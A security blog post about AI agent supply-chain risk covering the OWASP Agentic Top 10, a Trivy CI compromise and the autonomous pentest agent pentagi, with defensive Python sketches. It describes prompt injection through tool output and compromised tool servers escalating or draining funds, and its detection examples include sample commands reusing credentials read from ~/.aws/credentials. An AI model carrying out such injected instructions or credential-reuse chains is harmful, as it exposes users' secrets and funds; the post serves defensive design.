Agent Tooling Supply Chain Security: OWASP Agentic Top 10 and the pentagi Threat Model

Trivy got compromised. Autonomous pentest agents are trending. The OWASP Agentic Top 10 warned us.

I'm building payment rails for agent-to-agent payments

Two things happened in the same week. Trivy, one of the most widely used open-source container vulnerability scanners, had its GitHub Actions integration compromised in a supply chain attack. And pentagi - a fully autonomous AI agent penetration testing system - started trending on GitHub.

One showed how fragile the tools agents depend on are. The other showed what agents themselves can do when pointed at your infrastructure with no guardrails. Together, they illustrate the risks the OWASP Agentic Security Top 10 has been warning about since early 2026.

I've been thinking about this intersection for months while building agent payment infrastructure. Here's what the security picture actually looks like when you combine supply chain vulnerabilities with autonomous agent capabilities.

The OWASP Agentic Security Top 10: What It Gets Right

OWASP published its Agentic Security Top 10 specifically for AI agent systems. Unlike the LLM Top 10, it focuses on what happens when models get tools, autonomy, and the ability to chain actions together.

The top risks they identified:

  1. Agentic Misuse - Agents used to automate attacks (pentagi is literally this, but legitimized)
  2. Agentic Data Leakage - Agents exfiltrating sensitive data through tool outputs
  3. Agentic Identity and Access Management - Agents inheriting overprivileged permissions
  4. Prompt Injection at Agent Layer - Injections that redirect agent actions, not just model outputs
  5. Agentic Privilege Escalation - Agents bootstrapping from low-privilege to admin through tool chains
  6. Agentic Supply Chain - Compromised tools, plugins, MCP servers, or skill packages
  7. Agentic Insecure Output Handling - Agents producing outputs that become injection vectors downstream
  8. Agentic Monitoring Gaps - No visibility into what autonomous agents are actually doing
  9. Agentic Resource Overuse - Agents burning compute, API calls, or funds without limits
  10. Agentic Unintended Autonomy - Agents taking actions beyond their intended scope

Numbers 6 and 1 are the ones that converged this week. Let me break down why.

The Trivy Supply Chain Attack: Anatomy of Risk #6

The Trivy compromise wasn't an attack on Trivy's scanner source code. It targeted the GitHub Actions integration - the CI/CD step that runs automatically when developers push code. The attacker modified the action so that it exfiltrated secrets from the repositories that use Trivy for security scanning.

Think about the irony. The security scanner itself became the attack vector. And because Trivy runs in CI/CD with elevated permissions (it needs access to container images, package manifests, sometimes cloud credentials), the blast radius was enormous.
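One concrete mitigation for this pattern is pinning every third-party action to a full commit SHA instead of a mutable tag, which GitHub's own security hardening guidance recommends: a tag can be moved to malicious code, a commit SHA cannot. Below is a minimal Python sketch of a checker that flags unpinned `uses:` references in a workflow file. It uses a regex rather than a YAML parser, so treat it as a rough lint rather than a complete audit; `example/scanner-action` and its SHA are placeholders.

```python
import re

# Captures the reference in lines like "uses: owner/repo@ref" or "- uses: owner/repo/path@ref".
USES_RE = re.compile(r"^\s*(?:-\s*)?uses:\s*([^\s#]+)", re.MULTILINE)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_text: str) -> list[str]:
    """Return action references that are not pinned to a full 40-character commit SHA."""
    findings = []
    for match in USES_RE.finditer(workflow_text):
        ref = match.group(1).strip("'\"")
        # Local actions (./path) and container references (docker://) are skipped in this sketch.
        if ref.startswith(("./", "docker://")):
            continue
        _, _, version = ref.partition("@")
        if not FULL_SHA_RE.match(version):
            findings.append(ref)
    return findings


workflow = """
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: example/scanner-action@0123456789abcdef0123456789abcdef01234567
"""
print(unpinned_actions(workflow))  # ['actions/checkout@v4']
```

Pinning only helps if updates are reviewed: bumping the SHA should be a deliberate, approved change, not something a bot merges automatically.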

Now scale this to agent tooling. Every MCP server an agent loads is a supply chain dependency. Every skill package, every tool definition, every plugin. The everything-claude-code framework has 116 skills. DeerFlow has an MCP server registry. LangChain has hundreds of community tools.

Each one is a potential Trivy. A compromised MCP server doesn't just steal CI secrets - it runs inside an agent session with whatever permissions the agent has. File system access. Network access. Shell execution. Payment capabilities (if the agent has them).

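The attack surface for OWASP #6 in agent systems is far larger than in traditional CI/CD: a compromised CI step can steal the secrets it is handed, but a compromised agent tool inherits every capability the agent holds at runtime.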

pentagi: Autonomous Pentest Agents as Risk #1 Made Real

vxcontrol/pentagi is an autonomous AI agent system designed to perform penetration testing. It chains together reconnaissance, vulnerability discovery, exploitation, and reporting without human intervention.

This is OWASP #1 (Agentic Misuse) in production form. Not theoretical. Not a paper. A working system that points agents at infrastructure and lets them find and exploit vulnerabilities autonomously.

pentagi is a legitimate security tool - red teams need automation too. But the architecture it demonstrates works just as well for malicious use. An autonomous agent with tool access, persistence, and the ability to reason about multi-step exploitation chains is a capability that wasn't practically available 12 months ago.

The technical architecture matters: pentagi uses LLM-driven planning to identify attack paths, then executes them through tool integrations (nmap, metasploit, custom scripts). The agent maintains state across the engagement, learns from failed attempts, and adapts its strategy. Sound familiar? It's the same agent loop pattern used in coding agents, research agents, and trading agents. Just pointed at a different target.
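The loop described above can be sketched generically. This is not pentagi's code; it's a minimal Python illustration of the plan-act-observe pattern, with the LLM planner replaced by a plain function and the tool integrations replaced by a dict of callables (`toy_planner`, `missing_tool`, and `echo` are all hypothetical). Failed attempts are recorded as observations so the planner can adapt, and `max_steps` bounds the loop; without that bound, the loop is also an instance of OWASP #9.

```python
from dataclasses import dataclass, field
from typing import Callable, Optional


@dataclass
class AgentState:
    goal: str
    history: list[tuple[str, str, str]] = field(default_factory=list)  # (tool, argument, observation)
    done: bool = False


# A planner returns (tool_name, argument), or None when it decides the goal is met.
Planner = Callable[[AgentState], Optional[tuple[str, str]]]


def run_agent(state: AgentState, planner: Planner,
              tools: dict[str, Callable[[str], str]], max_steps: int = 10) -> AgentState:
    for _ in range(max_steps):
        step = planner(state)                  # in a real agent, this is an LLM call
        if step is None:
            state.done = True
            break
        tool_name, argument = step
        try:
            observation = tools[tool_name](argument)
        except Exception as exc:               # unknown tools and tool failures become observations
            observation = f"error: {exc}"
        state.history.append((tool_name, argument, observation))
    return state


def toy_planner(state: AgentState) -> Optional[tuple[str, str]]:
    """Stand-in for an LLM: try a tool, and switch strategy if the last attempt failed."""
    if not state.history:
        return ("missing_tool", "x")           # first attempt: a tool that doesn't exist
    _, _, last_observation = state.history[-1]
    if last_observation.startswith("error"):
        return ("echo", "retry")               # adapt after the failure
    return None                                # goal considered met


final = run_agent(AgentState(goal="demo"), toy_planner, {"echo": str.upper})
for entry in final.history:
    print(entry)
```

Swap the toy planner for a model call and the dict for shell, network, or payment tools, and this same skeleton becomes a coding agent, a research agent, or a pentest agent.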

Where Supply Chain Meets Autonomous Exploitation

Here's the convergence that should worry anyone building agent infrastructure:

Scenario: A compromised MCP server gets installed into an agent framework. The compromised server doesn't just exfiltrate data (Trivy pattern). It uses the agent's own capabilities to perform lateral movement. The agent has shell access? The compromised tool uses it. The agent has network access? The compromised tool scans internal services. The agent has payment tools? The compromised tool drains funds.

This isn't pentagi's fault - pentagi is a legitimate tool. But pentagi proves the capability exists: autonomous multi-step exploitation through agent tool chains is no longer hypothetical. The question is whether your agent framework's security model can handle a malicious tool inside the perimeter.

Most can't. Here's why.

Current Agent Security Models Are Insufficient

The standard agent security model is:

  1. User approves which tools the agent can use
  2. Some tools have confirmation prompts ("Are you sure you want to delete this file?")
  3. Sandboxing (if any) is at the process level

This misses three attack vectors the OWASP Agentic Top 10 identifies:

Cross-tool escalation (OWASP #5): An agent has a read-only file tool and a shell tool. A compromised MCP server uses the read tool to find credentials, passes them to the shell tool, and escalates. Each tool is "safe" in isolation. Together, they form an attack chain.
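Per-tool approval can't see this chain because it never looks at where a tool's arguments came from. A minimal sketch of one countermeasure, taint tracking, assuming hypothetical tool names `read_file` (a sensitive source) and `shell` (a dangerous sink): values returned by the source are remembered, and any sink call whose argument contains them is refused.

```python
import re


class TaintTracker:
    """Remember tokens returned by sensitive 'source' tools and block them at 'sink' tools.

    Matching is verbatim substring matching: base64-encoded, split, or paraphrased
    secrets will slip through, so this is one layer, not a complete defense.
    """

    def __init__(self, sources: set[str], sinks: set[str], min_len: int = 8):
        self.sources = sources
        self.sinks = sinks
        self.min_len = min_len              # ignore short tokens to limit false positives
        self._tainted: set[str] = set()

    def record_output(self, tool: str, output: str) -> None:
        if tool in self.sources:
            # Split "KEY=value" and "key: value" lines so the bare secret is tracked too.
            for token in re.split(r"[\s=:]+", output):
                if len(token) >= self.min_len:
                    self._tainted.add(token)

    def allow_call(self, tool: str, argument: str) -> bool:
        """Return False if a sink tool's argument contains data read from a source tool."""
        if tool not in self.sinks:
            return True
        return not any(token in argument for token in self._tainted)


tracker = TaintTracker(sources={"read_file"}, sinks={"shell"})
tracker.record_output("read_file", "DB_PASSWORD=hunter2-prod-9f3a\n")
print(tracker.allow_call("shell", "ls -la"))                                           # True
print(tracker.allow_call("shell", "curl -u admin:hunter2-prod-9f3a https://example.com"))  # False
```

The check sits between the model and the tools, so it applies no matter which tool, or which compromised MCP server, proposed the call.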

Output-as-injection (OWASP #4 and #7): An agent queries a compromised API. The API returns data with embedded instructions. The agent processes the data, follows the embedded instructions, and performs actions the user never authorized. This is prompt injection via tool output - a supply chain attack that doesn't require compromising the tool itself, only the data it returns.
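Filtering injected text out of tool output is unreliable, so a common fallback is to gate actions instead. A minimal sketch, assuming hypothetical tool names: once any output from an untrusted source enters the context, every side-effecting tool call requires human confirmation for the rest of the session. The flag is sticky on purpose, since the model can't reliably "un-see" instructions it has already read.

```python
from dataclasses import dataclass


@dataclass
class ContextGate:
    """Once untrusted tool output enters the context, side-effecting tools need human confirmation."""
    untrusted_sources: set[str]     # tools whose output may carry injected instructions
    side_effecting: set[str]        # tools that change state (files, payments, messages)
    context_untrusted: bool = False

    def observe(self, tool: str) -> None:
        if tool in self.untrusted_sources:
            self.context_untrusted = True

    def needs_confirmation(self, tool: str) -> bool:
        return self.context_untrusted and tool in self.side_effecting


gate = ContextGate(untrusted_sources={"http_get"}, side_effecting={"write_file", "send_payment"})
print(gate.needs_confirmation("write_file"))   # False: nothing untrusted seen yet
gate.observe("http_get")
print(gate.needs_confirmation("write_file"))   # True: the API response could have steered this call
print(gate.needs_confirmation("read_file"))    # False: read-only tools stay unattended
```

The trade-off is more confirmation prompts in sessions that touch external data; in exchange, an injected instruction can't silently turn into a write or a payment.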

Monitoring gaps (OWASP #8): Most agent frameworks log prompts and responses. Almost none log the full chain of tool invocations, parameter values, and side effects at a level that enables post-incident forensics. You can't investigate what you didn't record.
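Recording the tool chain doesn't need heavy infrastructure. A minimal sketch, assuming every tool call is routed through one wrapper: each invocation is appended as a JSON line with session, sequence number, parameters, outcome, and the side effects the caller declares (`ToolAuditLog` and the `side_effects` labels are hypothetical). In practice you would redact secrets from `params` before writing, or the audit log becomes a new leak.

```python
import json
import os
import tempfile
import time
from typing import Any, Callable


class ToolAuditLog:
    """Append-only JSON Lines record of every tool call: inputs, outcome, and declared side effects."""

    def __init__(self, path: str, session_id: str):
        self.path = path
        self.session_id = session_id
        self.seq = 0

    def call(self, tool: str, fn: Callable[..., Any], side_effects: list[str], **params: Any) -> Any:
        self.seq += 1
        record = {"session": self.session_id, "seq": self.seq, "tool": tool,
                  "params": params, "side_effects": side_effects, "started": time.time()}
        try:
            result = fn(**params)
            record.update(status="ok", result_preview=str(result)[:200])
            return result
        except Exception as exc:
            record.update(status="error", error=repr(exc))
            raise
        finally:
            # Written whether the call succeeded or failed, so failures are investigable too.
            record["finished"] = time.time()
            with open(self.path, "a", encoding="utf-8") as fh:
                fh.write(json.dumps(record, default=str) + "\n")


log_path = os.path.join(tempfile.mkdtemp(), "audit.jsonl")
audit = ToolAuditLog(log_path, session_id="session-1")
audit.call("add", lambda a, b: a + b, side_effects=[], a=2, b=3)
with open(log_path, encoding="utf-8") as fh:
    print(fh.readline())
```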

What Actually Works: Defense in Depth for Agent Systems

Based on what I've seen building and auditing agent payment systems, here's what a real defense model looks like:

Tool-level spending/action limits. Not just "can the agent use this tool?" but "how many times per hour?" and "what's the maximum impact per invocation?" For payment tools, this means SpendingPolicy enforcement - daily limits, per-transaction caps, recipient allowlists. For shell tools, this means command allowlists and output size limits.
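Here is a minimal sketch of those limits for a payment tool. It is modeled on the rules listed above (per-transaction cap, daily limit, recipient allowlist) plus a per-hour call budget, but `PaymentPolicy` is a hypothetical illustration, not the author's SpendingPolicy. Amounts are integers in minor units to avoid floating-point drift, and both limits use rolling windows.

```python
from collections import deque
from dataclasses import dataclass, field

DAY = 86_400   # seconds
HOUR = 3_600


@dataclass
class PaymentPolicy:
    """Illustrative limits for a payment tool; amounts are integers in minor units (e.g. cents)."""
    per_tx_cap: int
    daily_limit: int                 # applied over a rolling 24-hour window
    allowed_recipients: set[str]
    max_calls_per_hour: int
    _payments: deque = field(default_factory=deque, init=False, repr=False)  # (time, amount)
    _calls: deque = field(default_factory=deque, init=False, repr=False)     # attempt times

    def authorize(self, recipient: str, amount: int, now: float) -> tuple[bool, str]:
        # Expire entries that have left their rolling windows.
        while self._payments and now - self._payments[0][0] >= DAY:
            self._payments.popleft()
        while self._calls and now - self._calls[0] >= HOUR:
            self._calls.popleft()

        if len(self._calls) >= self.max_calls_per_hour:
            return False, "rate limit"
        self._calls.append(now)      # calls rejected by the checks below still count toward the rate

        if recipient not in self.allowed_recipients:
            return False, "recipient not allowlisted"
        if amount <= 0 or amount > self.per_tx_cap:
            return False, "per-transaction cap"
        if sum(a for _, a in self._payments) + amount > self.daily_limit:
            return False, "daily limit"
        self._payments.append((now, amount))
        return True, "ok"


policy = PaymentPolicy(per_tx_cap=5_000, daily_limit=8_000,
                       allowed_recipients={"vendor-a"}, max_calls_per_hour=3)
print(policy.authorize("vendor-a", 5_000, now=0))     # (True, 'ok')
print(policy.authorize("vendor-a", 4_000, now=10))    # (False, 'daily limit')
print(policy.authorize("attacker", 100, now=20))      # (False, 'recipient not allowlisted')
print(policy.authorize("vendor-a", 100, now=30))      # (False, 'rate limit')
```

Counting rejected attempts toward the rate limit matters: a compromised session probing for the cap burns its own budget.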

MCP server integrity verification. Every MCP server should have a verifiable hash. Every update should be explicitly approved. Auto-updates for agent tools are the Trivy pattern waiting to happen. Pin your versions. Verify your sources.
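A minimal sketch of hash pinning for an MCP server installed as a local directory: compute a SHA-256 digest over the whole file tree when the server is reviewed, store it in a lockfile, and refuse to load the server if the digest ever changes. The lockfile here is a plain dict and `files-mcp` is a hypothetical server name; a real setup would persist the lockfile and check it on every agent start.

```python
import hashlib
import tempfile
from pathlib import Path


def tree_digest(root: str) -> str:
    """SHA-256 over every file under root: relative path, length, and contents, in sorted order."""
    base = Path(root)
    files = sorted((p for p in base.rglob("*") if p.is_file()),
                   key=lambda p: p.relative_to(base).as_posix())
    h = hashlib.sha256()
    for path in files:
        data = path.read_bytes()
        h.update(path.relative_to(base).as_posix().encode("utf-8") + b"\0")
        h.update(len(data).to_bytes(8, "big"))   # length prefix keeps file boundaries unambiguous
        h.update(data)
    return h.hexdigest()


def verify_pinned(name: str, root: str, lockfile: dict[str, str]) -> None:
    """Raise unless the installed server tree matches the digest recorded at approval time."""
    expected = lockfile.get(name)
    if expected is None:
        raise PermissionError(f"{name}: not in lockfile, refusing to load")
    actual = tree_digest(root)
    if actual != expected:
        raise PermissionError(f"{name}: digest mismatch, expected {expected[:12]}, got {actual[:12]}")


# Usage: approve once, then verify before every load.
server_dir = tempfile.mkdtemp()
Path(server_dir, "server.py").write_text("print('tool server')\n")
lock = {"files-mcp": tree_digest(server_dir)}      # recorded when the server was reviewed
verify_pinned("files-mcp", server_dir, lock)         # passes silently
Path(server_dir, "server.py").write_text("print('tampered')\n")
try:
    verify_pinned("files-mcp", server_dir, lock)
except PermissionError as err:
    print(err)
```

Hashing the whole tree, not just an entry point, matters because a malicious update can hide in any helper module the server imports.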

Cross-tool interaction monitoring. Log not just individual tool calls, but the pattern of calls. "Read file then execute shell command with file contents" is a detectable pattern. "Query external API then modify local files based on response" is another. Pattern-based detection catches cross-tool escalation that individual tool monitoring misses.
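The two patterns named above can be expressed as rules over a sliding window of recorded calls. A minimal sketch, assuming a hypothetical call record (`Call`) and hypothetical tool names: a rule fires when an earlier call to one tool is followed within `window` steps by a call to another, optionally requiring that the later call's arguments reuse a token from the earlier call's output (a crude data-flow check).

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Call:
    tool: str
    args: str
    output: str


# Hypothetical rules: (earlier tool, later tool, require that later args reuse earlier output)
RULES = [
    ("read_file", "shell", True),        # read a file, then run a command containing its contents
    ("http_get", "write_file", False),   # query an external API, then modify local files
]


def _shares_content(output: str, args: str, min_len: int = 8) -> bool:
    # Crude data-flow check: does any reasonably long token of the output appear in the args?
    return any(len(tok) >= min_len and tok in args for tok in output.split())


def detect_patterns(calls: list[Call], window: int = 5) -> list[tuple[int, int, str]]:
    """Return (i, j, rule) for each earlier/later pair at most `window` steps apart that matches a rule."""
    hits = []
    for j, later in enumerate(calls):
        for i in range(max(0, j - window), j):
            earlier = calls[i]
            for first, second, needs_flow in RULES:
                if earlier.tool != first or later.tool != second:
                    continue
                if needs_flow and not _shares_content(earlier.output, later.args):
                    continue
                hits.append((i, j, f"{first} -> {second}"))
    return hits


calls = [
    Call("read_file", "~/.aws/credentials", "aws_secret_access_key = EXAMPLEKEY123"),
    Call("http_get", "https://api.example.com/data", "ok"),
    Call("shell", "export K=EXAMPLEKEY123 && aws s3 ls", ""),
    Call("write_file", "notes.txt", ""),
]
print(detect_patterns(calls))  # [(0, 2, 'read_file -> shell'), (1, 3, 'http_get -> write_file')]
```

Run offline over the audit log, this supports forensics; run inline before each call, the same rules can block the second step of a chain.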

Non-custodial architecture for sensitive operations. For payment tools specifically: non-custodial means the damage from a compromised agent session is bounded by the wallet's funded balance and SpendingPolicy limits. Custodial means a compromised session could potentially access the custodian's full infrastructure. Blast radius matters.
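One way to make "bounded" concrete, assuming a wallet funded with balance B, a rolling 24-hour spending limit D, and a compromise that goes undetected for T hours (symbols introduced here for illustration only):

```latex
L_{\max} \le \min\!\left(B,\; D \left\lceil \tfrac{T}{24\,\mathrm{h}} \right\rceil\right)
\qquad \text{e.g. } B = 500,\; D = 100,\; T = 36\,\mathrm{h}:\quad
L_{\max} \le \min(500,\; 100 \cdot 2) = 200
```

Any T-hour interval splits into at most ceil(T / 24 h) windows of 24 hours or less, and the policy caps each window at D; the wallet itself can never lose more than B. In the custodial case, the first term is no longer the agent's own funded balance.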

Audit trails on-chain. Every payment an agent makes should produce a verifiable, immutable receipt. Not a log entry that can be tampered with. An on-chain record that both parties can verify independently. This is defense against OWASP #8 specifically for financial operations.
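The property that makes an on-chain receipt trustworthy is tamper evidence. A minimal local sketch of the same idea is a hash chain, where each receipt commits to the hash of the previous one, so editing any past receipt breaks verification (the field names are hypothetical). The caveat is that whoever controls the whole chain can recompute every hash; a local chain is only as trustworthy as the place its latest hash is published, which is exactly the role an independently verifiable on-chain record plays.

```python
import hashlib
import json


def _digest(body: dict) -> str:
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode("utf-8")).hexdigest()


def append_receipt(chain: list[dict], payer: str, payee: str, amount: int) -> dict:
    """Append a receipt that commits to the previous receipt's hash."""
    prev = chain[-1]["hash"] if chain else "0" * 64
    body = {"payer": payer, "payee": payee, "amount": amount, "prev": prev, "seq": len(chain)}
    receipt = {**body, "hash": _digest(body)}
    chain.append(receipt)
    return receipt


def verify_chain(chain: list[dict]) -> bool:
    """Recompute every hash and link; any edited, reordered, or dropped receipt fails."""
    prev = "0" * 64
    for seq, receipt in enumerate(chain):
        body = {k: v for k, v in receipt.items() if k != "hash"}
        if body.get("prev") != prev or body.get("seq") != seq or _digest(body) != receipt["hash"]:
            return False
        prev = receipt["hash"]
    return True


chain: list[dict] = []
append_receipt(chain, "agent-wallet", "vendor-a", 2_500)
append_receipt(chain, "agent-wallet", "vendor-b", 1_000)
print(verify_chain(chain))       # True
chain[0]["amount"] = 25          # rewrite history
print(verify_chain(chain))       # False
```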

The Agent Security Stack Is Being Built Now

The agent security category is accelerating. pentagi for offensive testing. AgentShield (from everything-claude-code) for defensive scanning. Trivy's compromise pushing the DevSecOps community to rethink CI/CD trust models.

For anyone building agent systems right now, the OWASP Agentic Top 10 is the minimum reading list. The Trivy attack is the case study for supply chain risk. pentagi is the proof that autonomous agent exploitation works.

The agents are getting more capable every week. The security models need to keep pace.

This article was written with AI assistance. All technical claims, code, and architectural decisions were validated by the author.